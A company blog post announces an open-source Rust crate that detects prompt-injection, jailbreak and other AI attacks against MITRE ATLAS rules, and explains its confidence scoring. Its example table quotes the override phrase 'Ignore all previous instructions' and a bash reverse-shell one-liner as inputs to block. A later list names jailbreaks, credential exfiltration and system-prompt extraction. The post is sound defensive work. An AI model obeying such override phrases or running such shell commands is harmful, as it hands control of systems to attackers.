AKAVLABS
We open-sourced our AI attack detection engine — 97 MITRE ATLAS rules in a Rust crate

Today we're publishing atlas-detect — the detection engine that powers AgentSentry's AI attack prevention — as a standalone open-source Rust crate.

https://crates.io/crates/atlas-detect


The problem we were solving

When we started building AgentSentry, we needed to answer one question on every LLM API call: is this request an attack?

Not a heuristic guess. Not a vibe check. An actual mapping to the MITRE ATLAS framework — the authoritative catalogue of adversarial techniques targeting AI systems.

MITRE ATLAS has 16 tactics and 111 techniques. We needed to cover as many as possible, in real time, with zero tolerance for false positives on legitimate developer queries.

Here's what that looks like in practice:

"Ignore all previous instructions"          → AML.T0036 (Prompt Injection) — BLOCK
"How do I override a method in Python?"     → nothing — ALLOW  
"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"  → AML.T0057.002 (Reverse Shell) — BLOCK
"Explain how prompt injection works"        → nothing — ALLOW (educational context)

The second and fourth lines are where most detectors fail. We spent significant time on this.


How it works

The engine compiles all 97 detection patterns into a single RegexSet using Rust's regex crate. This means every request is scanned against all rules in one pass — not 97 sequential checks.

use atlas_detect::Detector;

let detector = Detector::new();
let hits = detector.scan("Ignore all previous instructions");

if detector.should_block(&hits) {
    // hits contains ["AML.T0036"]; block the request
}
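The one-pass idea can be illustrated with a simplified, std-only sketch. Plain substring checks stand in for the compiled patterns here, and the function name is ours, not the crate's API; `regex::RegexSet` does the real work with a combined automaton over the text:

```rust
/// Conceptual sketch of multi-pattern scanning: return the index of every
/// rule that matches, from a single call over the input. This is what
/// regex::RegexSet provides in one pass; lowercase substring checks stand
/// in for compiled regexes in this illustration.
fn scan_all(rules: &[&str], input: &str) -> Vec<usize> {
    let haystack = input.to_lowercase();
    rules
        .iter()
        .enumerate()
        .filter(|(_, pat)| haystack.contains(&pat.to_lowercase()))
        .map(|(i, _)| i)
        .collect()
}
```

The payoff of the set-based approach is that the match cost grows with the input length, not with the number of rules.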

The initial compilation is cached globally via once_cell. After the first call, Detector::new() is free. Scan latency on typical LLM prompts is under 1ms.
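The caching pattern looks roughly like this, sketched with std's `OnceLock` (equivalent to `once_cell` for this purpose); the simplified `Detector` struct and `get` accessor are our own stand-ins:

```rust
use std::sync::OnceLock;

// Simplified stand-in for the real detector; the actual crate compiles a
// RegexSet of 97 patterns here.
struct Detector {
    rules: Vec<String>,
}

impl Detector {
    fn get() -> &'static Detector {
        // Built once on first access; every later call returns the same
        // cached instance, so compilation cost is paid exactly once.
        static CACHE: OnceLock<Detector> = OnceLock::new();
        CACHE.get_or_init(|| Detector {
            rules: vec!["ignore all previous instructions".to_string()],
        })
    }
}
```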


The false positive problem

Early versions had a 30% false positive rate. Security education queries like "explain how prompt injection works for my course" were getting blocked alongside actual attacks.

The fix was confidence scoring. When a pattern matches, we compute a confidence score based on:

  • Base score from severity (Critical = 80, High = 65, Medium = 50...)
  • +20 if multiple techniques fire together (coordinated attack signal)
  • +20 if this agent has a high historical block rate
  • +10 if the message is unusually short (injections tend to be terse)
  • -25 if educational/research framing is detected

After scoring, we filter by threshold. A medium-severity hit needs 60% confidence to become a block. Critical hits only need 50%.
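As a sketch, the scoring and threshold logic described above might look like this (our own names and a deliberate simplification; the crate's internals may differ):

```rust
#[derive(Clone, Copy, PartialEq)]
enum Severity {
    Critical,
    High,
    Medium,
}

/// Compute a confidence score from the signals listed above
/// (hypothetical sketch; clamped to 0..=100).
fn confidence(
    severity: Severity,
    multi_technique: bool,
    high_block_history: bool,
    terse_message: bool,
    educational_framing: bool,
) -> i32 {
    let mut score = match severity {
        Severity::Critical => 80,
        Severity::High => 65,
        Severity::Medium => 50,
    };
    if multi_technique { score += 20; }      // coordinated attack signal
    if high_block_history { score += 20; }   // agent previously blocked often
    if terse_message { score += 10; }        // injections tend to be terse
    if educational_framing { score -= 25; }  // "explain how X works" queries
    score.clamp(0, 100)
}

/// Critical hits block at 50; everything else needs 60.
fn should_block(severity: Severity, score: i32) -> bool {
    let threshold = if severity == Severity::Critical { 50 } else { 60 };
    score >= threshold
}
```

Under this sketch, a medium hit with educational framing scores 25 and passes through, while a terse critical hit scores 90 and blocks.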

Result: 0% false positives on a 20-query clean test battery, 100% true positive rate maintained.


What it detects

97 content-detectable techniques across all 16 MITRE ATLAS tactics:

  • Prompt injection variants (AML.T0036 and sub-techniques)
  • Jailbreaks — DAN, STAN, roleplay framing, authority impersonation
  • Credential exfiltration — env var dumps, RAG credential harvesting
  • Model extraction — weight theft, system prompt extraction
  • RAG poisoning — embedded instructions in document-like content
  • Reverse shells and C2 — bash one-liners, PowerShell encoded commands
  • Multilingual injections — 20+ languages including Cyrillic homoglyphs
  • Base64/obfuscation evasion — decoded and re-scanned
  • Deepfake generation requests
  • Data destruction commands
  • Denial of service patterns
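To give one concrete flavour of the multilingual handling: Cyrillic homoglyph evasion can be neutralised by folding look-alike characters to ASCII before pattern matching. A minimal sketch with our own partial mapping table, not the crate's:

```rust
/// Fold common Cyrillic look-alikes to their ASCII twins so that a
/// homoglyph-laced prompt matches the same rules as its plain-ASCII form.
/// Partial table for illustration only.
fn fold_homoglyphs(input: &str) -> String {
    input
        .chars()
        .map(|c| match c {
            'а' => 'a', // U+0430 CYRILLIC SMALL LETTER A
            'е' => 'e', // U+0435
            'о' => 'o', // U+043E
            'р' => 'p', // U+0440
            'с' => 'c', // U+0441
            'х' => 'x', // U+0445
            'у' => 'y', // U+0443
            'і' => 'i', // U+0456
            other => other,
        })
        .collect()
}
```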

14 additional ATLAS techniques require behavioral detection (rate limiting, auth pattern analysis) — content regex can't catch them, and atlas-detect is honest about this in the docs.


Why open source this

The detection rules are not our competitive advantage. Anyone determined enough could reconstruct them from the MITRE ATLAS documentation.

Our advantage is the integrated system: the enforcement gateway, agent discovery, incident correlation, topology mapping, per-agent policy engine, and the platform that ties it all together. That stays closed.

But the detection engine is genuinely useful to the Rust community — anyone building an LLM proxy, an AI security tool, or just adding safety checks to an AI application. Publishing it creates goodwill, drives inbound interest in AgentSentry, and positions Akav Labs as contributors to the AI security ecosystem rather than just consumers of it.


Using it in your project

[dependencies]
atlas-detect = "0.1"

With serde for JSON serialization:

atlas-detect = { version = "0.1", features = ["serde"] }

With context for better accuracy:

use atlas_detect::{Detector, ScanContext};

let detector = Detector::new();
let ctx = ScanContext {
    content: user_message.to_string(),
    agent_block_history: get_agent_block_ratio(&agent_id),
    ..Default::default()
};
let hits = detector.scan_with_context(&ctx);

Full documentation at docs.rs/atlas-detect.


What's next

We're working on:

  • atlas-detect-async — async wrapper for Tokio-based applications
  • Rule contribution guidelines — the community should be able to add patterns
  • OWASP Agentic Top 10 coverage alongside MITRE ATLAS
  • Language model-based detection for evasion-resistant techniques

If you're building something with this, we want to know. Open an issue on github.com/akav-labs/atlas-detect or find us at security@akav.io.


Built by Akav Labs — the team behind AgentSentry, the AI agent security platform.

https://akav.io | https://as.akav.io | https://crates.io/crates/atlas-detect
